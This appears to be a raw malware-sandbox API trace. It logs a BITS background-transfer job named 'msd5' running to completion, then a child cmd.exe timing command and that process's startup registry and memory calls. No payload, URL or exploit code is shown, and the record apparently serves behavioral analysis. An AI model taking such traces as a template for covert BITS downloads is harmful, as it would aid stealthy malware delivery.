[0079.931] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0079.931] _vsnwprintf (in: _Buffer=0x2cef7c, _BufferCount=0xfe, _Format="%I64u Seconds", _ArgList=0x2cef34 | out: _Buffer="0 Seconds") returned 9
[0079.931] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2cf194 | out: lpConsoleScreenBufferInfo=0x2cf194) returned 1
[0079.931] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1e43c4*, nNumberOfCharsToWrite=0x9, lpNumberOfCharsWritten=0x2cf1ac, lpReserved=0x0 | out: lpBuffer=0x1e43c4*, lpNumberOfCharsWritten=0x2cf1ac*=0x9) returned 1
[0079.931] CoTaskMemFree (pv=0x4383d8)
[0079.932] PeekMessageW (in: lpMsg=0x2cfb08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2cfb08) returned 0
[0079.932] MsgWaitForMultipleObjectsEx (nCount=0x1, pHandles=0x2cfb30*=0x3, dwMilliseconds=0xffffffff, dwWakeMask=0x4ff, dwFlags=0x2) returned 0x1
[0080.031] PeekMessageW (in: lpMsg=0x2cfb08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2cfb08) returned 1
[0080.031] TranslateMessage (lpMsg=0x2cfb08) returned 0
[0080.031] DispatchMessageW (lpMsg=0x2cfb08) returned 0x1
[0080.032] IBackgroundCopyCallback:JobModification (This=0x440cc8, pJob=0x42a6e4, dwReserved=0x0) returned 0x0
[0080.032] IBackgroundCopyJob:GetState (in: This=0x42a654, pVal=0x440cd4 | out: pVal=0x440cd4) returned 0x0
[0080.033] IBackgroundCopyCallback:JobTransferred (This=0x440cc8, pJob=0x42a6e4) returned 0x0
[0080.033] IBackgroundCopyJob:GetState (in: This=0x42a654, pVal=0x440cd4 | out: pVal=0x440cd4) returned 0x0
[0080.033] IBackgroundCopyJob:GetType (in: This=0x42a654, pVal=0x2ce13c | out: pVal=0x2ce13c) returned 0x0
[0080.034] IBackgroundCopyJob:GetProgress (in: This=0x42a654, pVal=0x440cd8 | out: pVal=0x440cd8) returned 0x0
[0080.035] IBackgroundCopyJob:GetPriority (in: This=0x42a654, pVal=0x2ce138 | out: pVal=0x2ce138) returned 0x0
[0080.036] CoTaskMemFree (pv=0x0)
[0080.036] IBackgroundCopyJob:GetDisplayName (in: This=0x42a654, pVal=0x2ce150 | out: pVal=0x2ce150*="msd5") returned 0x0
[0080.037] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2ce0f8 | out: lpConsoleScreenBufferInfo=0x2ce0f8) returned 1
[0080.037] FillConsoleOutputCharacterW (in: hConsoleOutput=0x7, cCharacter=0x20, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfCharsWritten=0x2ce110 | out: lpNumberOfCharsWritten=0x2ce110) returned 1
[0080.037] FillConsoleOutputAttribute (in: hConsoleOutput=0x7, wAttribute=0x7, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfAttrsWritten=0x2ce110 | out: lpNumberOfAttrsWritten=0x2ce110) returned 1
[0080.038] SetConsoleCursorPosition (hConsoleOutput=0x7, dwCursorPosition=0x0) returned 1
[0080.038] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0080.038] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2ce0e4 | out: lpConsoleScreenBufferInfo=0x2ce0e4) returned 1
[0080.038] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1e43c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x2ce0fc, lpReserved=0x0 | out: lpBuffer=0x1e43c4*, lpNumberOfCharsWritten=0x2ce0fc*=0xa) returned 1
[0080.039] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0080.039] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2ce0e0 | out: lpConsoleScreenBufferInfo=0x2ce0e0) returned 1
[0080.039] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1e43c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x2ce0f8, lpReserved=0x0 | out: lpBuffer=0x1e43c4*, lpNumberOfCharsWritten=0x2ce0f8*=0x5) returned 1
[0080.039] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0080.039] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2ce0e8 | out: lpConsoleScreenBufferInfo=0x2ce0e8) returned 1
[0080.040] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1e43c4*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x2ce100, lpReserved=0x0 | out: lpBuffer=0x1e43c4*, lpNumberOfCharsWritten=0x2ce100*=0x7) returned 1
[0080.040] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0080.040] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2ce0dc | out: lpConsoleScreenBufferInfo=0x2ce0dc) returned 1
[0080.040] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1e43c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x2ce0f4, lpReserved=0x0 | out: lpBuffer=0x1e43c4*, lpNumberOfCharsWritten=0x2ce0f4*=0x8) returned 1
[0080.041] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0080.041] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2ce0e4 | out: lpConsoleScreenBufferInfo=0x2ce0e4) returned 1
[0080.041] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1e43c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x2ce0fc, lpReserved=0x0 | out: lpBuffer=0x1e43c4*, lpNumberOfCharsWritten=0x2ce0fc*=0x8) returned 1
[0080.041] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0080.041] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2ce0d8 | out: lpConsoleScreenBufferInfo=0x2ce0d8) returned 1
[0080.042] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1e43c4*, nNumberOfCharsToWrite=0xd, lpNumberOfCharsWritten=0x2ce0f0, lpReserved=0x0 | out: lpBuffer=0x1e43c4*, lpNumberOfCharsWritten=0x2ce0f0*=0xd) returned 1
[0080.042] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0080.042] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2ce0e8 | out: lpConsoleScreenBufferInfo=0x2ce0e8) returned 1
[0080.042] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1e43c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x2ce100, lpReserved=0x0 | out: lpBuffer=0x1e43c4*, lpNumberOfCharsWritten=0x2ce100*=0xa) returned 1
[0080.043] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0080.043] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2ce0d0 | out: lpConsoleScreenBufferInfo=0x2ce0d0) returned 1
[0080.043] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1e43c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x2ce0e8, lpReserved=0x0 | out: lpBuffer=0x1e43c4*, lpNumberOfCharsWritten=0x2ce0e8*=0xa) returned 1
[0080.043] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0080.043] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2ce0d8 | out: lpConsoleScreenBufferInfo=0x2ce0d8) returned 1
[0080.044] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1e43c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x2ce0f0, lpReserved=0x0 | out: lpBuffer=0x1e43c4*, lpNumberOfCharsWritten=0x2ce0f0*=0x8) returned 1
[0080.044] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0080.044] _vsnwprintf (in: _Buffer=0x1f03f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x2ce0fc | out: _Buffer="1") returned 1
[0080.044] _vsnwprintf (in: _Buffer=0x1f03f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x2ce108 | out: _Buffer="1") returned 1
[0080.044] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2ce0d8 | out: lpConsoleScreenBufferInfo=0x2ce0d8) returned 1
[0080.044] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1e43c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x2ce0f0, lpReserved=0x0 | out: lpBuffer=0x1e43c4*, lpNumberOfCharsWritten=0x2ce0f0*=0x5) returned 1
[0080.045] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0080.045] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2ce0e0 | out: lpConsoleScreenBufferInfo=0x2ce0e0) returned 1
[0080.045] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1e43c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x2ce0f8, lpReserved=0x0 | out: lpBuffer=0x1e43c4*, lpNumberOfCharsWritten=0x2ce0f8*=0x8) returned 1
[0080.045] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0080.045] _vsnwprintf (in: _Buffer=0x1f03f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x2ce104 | out: _Buffer="325120") returned 6
[0080.046] _vsnwprintf (in: _Buffer=0x1f03f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x2ce108 | out: _Buffer="325120") returned 6
[0080.046] _vsnwprintf (in: _Buffer=0x1f03f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x2ce104 | out: _Buffer="100") returned 3
[0080.046] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2ce100 | out: lpConsoleScreenBufferInfo=0x2ce100) returned 1
[0080.046] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1e43c4*, nNumberOfCharsToWrite=0x16, lpNumberOfCharsWritten=0x2ce118, lpReserved=0x0 | out: lpBuffer=0x1e43c4*, lpNumberOfCharsWritten=0x2ce118*=0x16) returned 1
[0080.046] CoTaskMemFree (pv=0x4383d8)
[0080.046] IBackgroundCopyJob:Complete (This=0x42a654) returned 0x0
[0080.053] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2ce104 | out: lpConsoleScreenBufferInfo=0x2ce104) returned 1
[0080.054] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2ce0d8 | out: lpConsoleScreenBufferInfo=0x2ce0d8) returned 1
[0080.054] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1e43c4*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x2ce0f0, lpReserved=0x0 | out: lpBuffer=0x1e43c4*, lpNumberOfCharsWritten=0x2ce0f0*=0x2) returned 1
[0080.054] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2ce0d8 | out: lpConsoleScreenBufferInfo=0x2ce0d8) returned 1
[0080.054] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1e43c4*, nNumberOfCharsToWrite=0x14, lpNumberOfCharsWritten=0x2ce0f0, lpReserved=0x0 | out: lpBuffer=0x1e43c4*, lpNumberOfCharsWritten=0x2ce0f0*=0x14) returned 1
[0080.054] GetCurrentThreadId () returned 0xe90
[0080.054] PostThreadMessageW (idThread=0xe90, Msg=0x401, wParam=0x0, lParam=0x0) returned 1
[0080.055] PeekMessageW (in: lpMsg=0x2cfb08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2cfb08) returned 1
[0080.055] IUnknown:Release (This=0x42a654) returned 0x1
[0080.055] IUnknown:Release (This=0x42a57c) returned 0x0
[0080.056] CoUninitialize ()
[0080.056] IUnknown:Release (This=0x440cc8) returned 0x2
[0080.056] IUnknown:Release (This=0x440cc8) returned 0x1
[0080.056] IUnknown:Release (This=0x440cc8) returned 0x0
[0080.056] IUnknown:Release (This=0x42a654) returned 0x1
[0080.056] CoTaskMemFree (pv=0x440cc8)
[0080.060] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
[0080.060] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1b7) returned 1
[0080.060] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0080.060] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0080.060] CloseHandle (hObject=0x80) returned 1
[0080.060] exit (_Code=0)
Thread:
id = 208
os_tid = 0xea4
Thread:
id = 209
os_tid = 0xea8
Thread:
id = 210
os_tid = 0xeac
Thread:
id = 211
os_tid = 0xeb0
Process:
id = "22"
image_name = "cmd.exe"
filename = "c:\\windows\\system32\\cmd.exe"
page_root = "0x7f1be620"
os_pid = "0xec0"
os_integrity_level = "0x3000"
os_privileges = "0x60800000"
monitor_reason = "child_process"
parent_id = "6"
os_parent_pid = "0xa98"
cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /k echo %time% && timeout 5 > NUL && exit"
cur_dir = "C:\\Windows\\system32\\"
os_username = "CRH2YWU7\\EEBsYm5"
os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ed0e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 2133
start_va = 0x10000
end_va = 0x2ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 2134
start_va = 0x30000
end_va = 0x33fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 2135
start_va = 0x40000
end_va = 0x40fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 2136
start_va = 0xd0000
end_va = 0x1cffff
entry_point = 0x0
region_type = private
name = "private_0x00000000000d0000"
filename = ""
Region:
id = 2137
start_va = 0x4a520000
end_va = 0x4a56bfff
entry_point = 0x4a520000
region_type = mapped_file
name = "cmd.exe"
filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")
Region:
id = 2138
start_va = 0x76f20000
end_va = 0x7705bfff
entry_point = 0x76f20000
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 2139
start_va = 0x77160000
end_va = 0x77160fff
entry_point = 0x77160000
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 2140
start_va = 0x7ffb0000
end_va = 0x7ffd2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007ffb0000"
filename = ""
Region:
id = 2141
start_va = 0x7ffd9000
end_va = 0x7ffd9fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffd9000"
filename = ""
Region:
id = 2142
start_va = 0x7ffdf000
end_va = 0x7ffdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdf000"
filename = ""
Region:
id = 2143
start_va = 0x10000
end_va = 0x1ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 2144
start_va = 0x20000
end_va = 0x2ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 2145
start_va = 0x50000
end_va = 0xb6fff
entry_point = 0x50000
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 2146
start_va = 0x1f0000
end_va = 0x2effff
entry_point = 0x0
region_type = private
name = "private_0x00000000001f0000"
filename = ""
Region:
id = 2147
start_va = 0x4c0000
end_va = 0x4cffff
entry_point = 0x0
region_type = private
name = "private_0x00000000004c0000"
filename = ""
Region:
id = 2148
start_va = 0x6ce00000
end_va = 0x6ce06fff
entry_point = 0x6ce00000
region_type = mapped_file
name = "winbrand.dll"
filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll")
Region:
id = 2149
start_va = 0x75320000
end_va = 0x75369fff
entry_point = 0x75320000
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 2150
start_va = 0x75370000
end_va = 0x75443fff
entry_point = 0x75370000
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 2151
start_va = 0x754b0000
end_va = 0x754b9fff
entry_point = 0x754b0000
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 2152
start_va = 0x75700000
end_va = 0x757abfff
entry_point = 0x75700000
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 2153
start_va = 0x757b0000
end_va = 0x75878fff
entry_point = 0x757b0000
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 2154
start_va = 0x75880000
end_va = 0x758cdfff
entry_point = 0x75880000
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 2155
start_va = 0x75bc0000
end_va = 0x75c5cfff
entry_point = 0x75bc0000
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 2156
start_va = 0x7f6f0000
end_va = 0x7f7effff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007f6f0000"
filename = ""
Region:
id = 2157
start_va = 0x2f0000
end_va = 0x3b7fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000002f0000"
filename = ""
Region:
id = 2158
start_va = 0x759b0000
end_va = 0x75a7bfff
entry_point = 0x759b0000
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 2159
start_va = 0x76e40000
end_va = 0x76e5efff
entry_point = 0x76e40000
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 2160
start_va = 0xc0000
end_va = 0xc6fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000c0000"
filename = ""
Region:
id = 2161
start_va = 0x1d0000
end_va = 0x1d1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001d0000"
filename = ""
Region:
id = 2162
start_va = 0x1e0000
end_va = 0x1e0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000001e0000"
filename = ""
Region:
id = 2163
start_va = 0x3c0000
end_va = 0x3c0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000003c0000"
filename = ""
Region:
id = 2164
start_va = 0x4d0000
end_va = 0x5d0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000004d0000"
filename = ""
Region:
id = 2165
start_va = 0x5e0000
end_va = 0x11dffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000005e0000"
filename = ""
Region:
id = 2166
start_va = 0x11e0000
end_va = 0x1342fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000011e0000"
filename = ""
Thread:
id = 214
os_tid = 0xec4
[0080.162] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cfbb4 | out: lpSystemTimeAsFileTime=0x1cfbb4*(dwLowDateTime=0xe05df790, dwHighDateTime=0x1d469c7))
[0080.162] GetCurrentProcessId () returned 0xec0
[0080.163] GetCurrentThreadId () returned 0xec4
[0080.163] GetTickCount () returned 0x21e68
[0080.163] QueryPerformanceCounter (in: lpPerformanceCount=0x1cfbac | out: lpPerformanceCount=0x1cfbac*=1815410800000) returned 1
[0080.163] GetModuleHandleA (lpModuleName=0x0) returned 0x4a520000
[0080.163] __set_app_type (_Type=0x1)
[0080.163] __p__fmode () returned 0x757a31f4
[0080.164] __p__commode () returned 0x757a31fc
[0080.164] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a5421a6) returned 0x0
[0080.164] __getmainargs (in: _Argc=0x4a544238, _Argv=0x4a544240, _Env=0x4a54423c, _DoWildCard=0, _StartInfo=0x4a544140 | out: _Argc=0x4a544238, _Argv=0x4a544240, _Env=0x4a54423c) returned 0
[0080.164] GetCurrentThreadId () returned 0xec4
[0080.164] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xec4) returned 0x38
[0080.164] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75370000
[0080.164] GetProcAddress (hModule=0x75370000, lpProcName="SetThreadUILanguage") returned 0x753c24c2
[0080.164] SetThreadUILanguage (LangId=0x0) returned 0x409
[0080.165] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
[0080.165] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cfb44 | out: phkResult=0x1cfb44*=0x0) returned 0x2
[0080.165] VirtualQuery (in: lpAddress=0x1cfb7b, lpBuffer=0x1cfb14, dwLength=0x1c | out: lpBuffer=0x1cfb14*(BaseAddress=0x1cf000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
[0080.165] VirtualQuery (in: lpAddress=0xd0000, lpBuffer=0x1cfb14, dwLength=0x1c | out: lpBuffer=0x1cfb14*(BaseAddress=0xd0000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c
[0080.165] VirtualQuery (in: lpAddress=0xd1000, lpBuffer=0x1cfb14, dwLength=0x1c | out: lpBuffer=0x1cfb14*(BaseAddress=0xd1000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c
[0080.165] VirtualQuery (in: lpAddress=0xd3000, lpBuffer=0x1cfb14, dwLength=0x1c | out: lpBuffer=0x1cfb14*(BaseAddress=0xd3000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
[0080.165] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x1cfb14, dwLength=0x1c | out: lpBuffer=0x1cfb14*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x40000)) returned 0x1c
[0080.165] GetConsoleOutputCP () returned 0x1b5
[0080.165] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a544260 | out: lpCPInfo=0x4a544260) returned 1
[0080.165] SetConsoleCtrlHandler (HandlerRoutine=0x4a53e72a, Add=1) returned 1
[0080.165] _get_osfhandle (_FileHandle=1) returned 0x7
[0080.165] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1
[0080.165] _get_osfhandle (_FileHandle=1) returned 0x7
[0080.165] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a5441ac | out: lpMode=0x4a5441ac) returned 1
[0080.166] _get_osfhandle (_FileHandle=1) returned 0x7
[0080.166] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0080.166] _get_osfhandle (_FileHandle=0) returned 0x3
[0080.166] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a5441b0 | out: lpMode=0x4a5441b0) returned 1
[0080.166] _get_osfhandle (_FileHandle=0) returned 0x3
[0080.166] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1
[0080.166] GetEnvironmentStringsW () returned 0x200108*
[0080.167] FreeEnvironmentStringsW (penv=0x200108) returned 1
[0080.167] GetEnvironmentStringsW () returned 0x200108*
[0080.167] FreeEnvironmentStringsW (penv=0x200108) returned 1
[0080.167] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ceab4 | out: phkResult=0x1ceab4*=0x40) returned 0x0
[0080.167] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ceabc, lpData=0x1ceac0, lpcbData=0x1ceab8*=0x1000 | out: lpType=0x1ceabc*=0x0, lpData=0x1ceac0*=0x0, lpcbData=0x1ceab8*=0x1000) returned 0x2
[0080.167] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ceabc, lpData=0x1ceac0, lpcbData=0x1ceab8*=0x1000 | out: lpType=0x1ceabc*=0x4, lpData=0x1ceac0*=0x1, lpcbData=0x1ceab8*=0x4) returned 0x0
[0080.167] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ceabc, lpData=0x1ceac0, lpcbData=0x1ceab8*=0x1000 | out: lpType=0x1ceabc*=0x0, lpData=0x1ceac0*=0x1, lpcbData=0x1ceab8*=0x1000) returned 0x2
[0080.167] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ceabc, lpData=0x1ceac0, lpcbData=0x1ceab8*=0x1000 | out: lpType=0x1ceabc*=0x4, lpData=0x1ceac0*=0x0, lpcbData=0x1ceab8*=0x4) returned 0x0
[0080.167] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ceabc, lpData=0x1ceac0, lpcbData=0x1ceab8*=0x1000 | out: lpType=0x1ceabc*=0x4, lpData=0x1ceac0*=0x40, lpcbData=0x1ceab8*=0x4) returned 0x0
[0080.167] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ceabc, lpData=0x1ceac0, lpcbData=0x1ceab8*=0x1000 | out: lpType=0x1ceabc*=0x4, lpData=0x1ceac0*=0x40, lpcbData=0x1ceab8*=0x4) returned 0x0
[0080.167] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ceabc, lpData=0x1ceac0, lpcbData=0x1ceab8*=0x1000 | out: lpType=0x1ceabc*=0x0, lpData=0x1ceac0*=0x40, lpcbData=0x1ceab8*=0x1000) returned 0x2
[0080.167] RegCloseKey (hKey=0x40) returned 0x0
[0080.167] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ceab4 | out: phkResult=0x1ceab4*=0x40) returned 0x0
[0080.167] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ceabc, lpData=0x1ceac0, lpcbData=0x1ceab8*=0x1000 | out: lpType=0x1ceabc*=0x0, lpData=0x1ceac0*=0x40, lpcbData=0x1ceab8*=0x1000) returned 0x2
[0080.168] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ceabc, lpData=0x1ceac0, lpcbData=0x1ceab8*=0x1000 | out: lpType=0x1ceabc*=0x4, lpData=0x1ceac0*=0x1, lpcbData=0x1ceab8*=0x4) returned 0x0
[0080.168] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ceabc, lpData=0x1ceac0, lpcbData=0x1ceab8*=0x1000 | out: lpType=0x1ceabc*=0x0, lpData=0x1ceac0*=0x1, lpcbData=0x1ceab8*=0x1000) returned 0x2
[0080.168] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ceabc, lpData=0x1ceac0, lpcbData=0x1ceab8*=0x1000 | out: lpType=0x1ceabc*=0x4, lpData=0x1ceac0*=0x0, lpcbData=0x1ceab8*=0x4) returned 0x0
